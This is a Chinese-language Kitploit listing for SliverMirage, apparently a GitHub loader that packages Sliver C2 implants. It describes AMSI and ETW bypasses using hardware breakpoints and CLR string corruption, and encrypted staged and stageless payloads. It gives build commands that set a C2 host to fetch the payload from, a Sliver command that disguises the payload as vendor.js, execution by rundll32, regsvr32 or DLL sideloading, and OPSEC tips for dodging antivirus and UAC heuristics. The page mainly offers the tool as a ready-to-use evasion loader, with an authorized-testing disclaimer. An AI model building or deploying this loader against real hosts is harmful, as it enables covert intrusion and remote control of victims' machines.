Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
SliverMirage — Crystal Palace 面向 Sliver C2 的 PICO 加载器:双层 AMSI 绕过、ETW 静默、AES-256-CBC 加密有效载荷、6 种投递变体 | Kitploit
工具/GitHubGitHub/daniomass/slivermirage
漏洞利用后渗透利用恶意软件分析命令与控制二进制分析红队Payload 开发
GitHubdaniomass/slivermirage

SliverMirage

Crystal Palace 面向 Sliver C2 的 PICO 加载器:双层 AMSI 绕过、ETW 静默、AES-256-CBC 加密有效载荷、6 种投递变体

查看仓库
1545天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

SliverMirage

本项目是 CrystalSliver 的一个分支,在 Crystal Palace PICO 加载器的基础上扩展了双层 AMSI 绕过、ETW 静默,以及面向 Sliver C2 的六种投递变体。

功能

SliverMirage 将 Sliver 植入体 DLL 通过 Crystal Palace PICO 虚拟化进行封装,然后通过一个无需修补 amsi.dll 或 ntdll.dll 即可绕过 AMSI 和 ETW 的加载器进行投递。

规避技术栈:

层技术详情
AMSI L1CLR 字符串破坏LdrRegisterDllNotification 拦截 clr.dll 加载,在 CLR 调用 GetProcAddress 之前破坏 .rdata 中的 AmsiScanBuffer
AMSI L2VEH + HWBP针对 AmsiScanBuffer 的向量化异常处理程序返回 E_INVALIDARG
ETWHWBP在 NtTraceControl 上设置 DR1,并返回 STATUS_SUCCESS
负载AES-256-CBC + XOR使用 BCrypt 解密,VirtualAlloc(RW) -> VirtualProtect(RX),全程无 RWX
虚拟化Crystal Palace PICOSliver DLL 在 PICO 进程中运行,对用户态 AV 不可见

变体

分阶段变体会在运行时从 Sliver HTTPS 网站下载加密的 PICO。EXE/DLL 体积很小(约 20 KB),磁盘上不携带任何负载。

无阶段变体在编译时将加密的 PICO 嵌入其中(XOR + AES 双层)。磁盘体积更大,但在 beacon 回连之前完全没有任何网络活动。

快速开始

环境要求

  • x86_64-w64-mingw32-gcc(mingw-w64)
  • nasm
  • 带有 pefile 的 python3(pip install pefile)
  • openssl
  • Java 17(用于 Crystal Palace,build.sh 会自动安装)

使用 build.sh 构建(推荐)

构建脚本会自动安装缺失的依赖(包括 Crystal Palace 和 Java 17),并处理完整流程:DLL -> Crystal Palace PICO -> 加密 -> 编译。

root@kitploit:~
# 分阶段 EXE(默认)
./build.sh --dll /path/to/sliver_implant.dll --host 10.0.0.1

# 无阶段 EXE
./build.sh --dll /path/to/sliver_implant.dll --format exe-stageless

# 无阶段 DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll

# 分阶段 DLL
./build.sh --dll /path/to/sliver_implant.dll --format dll-staged --host 10.0.0.1

# Shellcode(分阶段)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode --host 10.0.0.1

# Shellcode(无阶段)
./build.sh --dll /path/to/sliver_implant.dll --format shellcode-stageless

选项:

  • --dll <path> — Sliver 植入体 DLL(必需)
  • --host <ip> — C2 服务器 IP(分阶段格式必需)
  • --port <port> — C2 端口(默认:443)
  • --path <path> — 负载下载的 URL 路径(默认:/assets/js/vendor.js)
  • --format <fmt> — 输出格式(默认:exe)
  • --export <name> — 自定义 DLL 导出名

使用 Make 构建(手动)

如果你已经有一个 Crystal Palace PICO 数据块:

root@kitploit:~
# 分阶段 EXE
make PICO=/path/to/implant.crystal.bin C2_HOST=10.0.0.1

# 无阶段 EXE
make exe-stageless PICO=/path/to/implant.crystal.bin

# 无阶段 DLL
make dll PICO=/path/to/implant.crystal.bin

# 清理所有目标
make clean

部署

分阶段(EXE 或 DLL)

  1. 将 build/payload.dat 上传到 Sliver HTTPS 网站:

    root@kitploit:~
    sliver > websites add-content --website cover \
      --web-path /assets/js/vendor.js \
      --content-type application/javascript \
      --content build/payload.dat
    
  2. 将 build/csvchelper.exe(或 .dll)投递到目标主机。

无阶段

单文件投递,无需设置 C2 网站。

DLL 执行方式

root@kitploit:~
rundll32 csvchelper.dll,StartW
regsvr32 /s csvchelper.dll

或者使用 DLL 侧加载(重命名以匹配目标应用程序会加载的合法 DLL)。

导出函数: DllRegisterServer、DllUnregisterServer、StartW、VoidFunc

项目结构

root@kitploit:~
SliverMirage/
  loader/                    # Crystal Palace PICO loader (from CrystalSliver)
    src/                     # Loader C sources + draugr ASM
    loader.spec              # Crystal Palace linker spec
    pico.spec                # PICO generation spec
  src/
    stager_remote.c          # Staged EXE
    stager_stageless.c       # Stageless EXE
    stager_remote_dll.c      # Staged DLL
    stager_stageless_dll.c   # Stageless DLL
    stager_debug.c           # Debug EXE (MessageBox diagnostics)
  scripts/
    gen_payload.py           # AES-256-CBC encrypt (staged)
    gen_payload_stageless.py # AES + XOR embed (stageless)
    dll_to_shellcode.py      # sRDI DLL-to-shellcode converter
  resources/
    resource.rc              # Version info (EXE)
    resource_dll.rc          # Version info (DLL)
    manifest.xml             # asInvoker manifest
  libtcg.x64.zip             # TCG library for Crystal Palace
  Makefile
  build.sh

OPSEC 注意事项

  • IAT 干净:仅包含 kernel32、advapi32、bcrypt —— 均为合法的 Windows API
  • 无内存补丁:AMSI/ETW 绕过使用硬件断点,而非在系统 DLL 上调用 VirtualProtect
  • 无 RWX:负载内存从 RW -> RX,绝不会变成 RWX
  • GUI 子系统:WinMain 入口点,-mwindows —— 无控制台窗口闪烁
  • 版本信息与清单:嵌入 asInvoker 清单,抑制 UAC 启发式检测
  • 熵控制:无阶段负载使用 XOR 滚动密钥,将熵从约 7.8 降低到约 6.0-6.5
  • 构建前请使用你的掩护身份自定义 resource.rc / resource_dll.rc

免责声明

本项目仅供授权的安全测试、研究和教育目的使用。请仅在获得明确书面许可进行渗透测试的环境中使用。未经授权访问计算机系统属于违法行为。作者不对本软件的滥用承担任何责任。

致谢

  • Crystal Palace —— 作者 Rasta Mouse,PICO 虚拟化引擎
  • CrystalSliver —— 原始 Crystal Palace + Sliver 集成
  • sRDI —— 作者 Nick Landers,shellcode 反射式 DLL 注入技术

许可证

MIT

下载工具
格式文件投递方式运行时是否需要 C2?
exe分阶段 EXEEXE + 位于 C2 网站上的 payload.dat是(HTTPS)
exe-stageless无阶段 EXE单个 EXE否
dll无阶段 DLL单个 DLL否
dll-staged分阶段 DLLDLL + 位于 C2 网站上的 payload.dat是(HTTPS)
shellcode分阶段 Shellcode.bin + payload.dat是(HTTPS)
shellcode-stageless无阶段 Shellcode单个 .bin否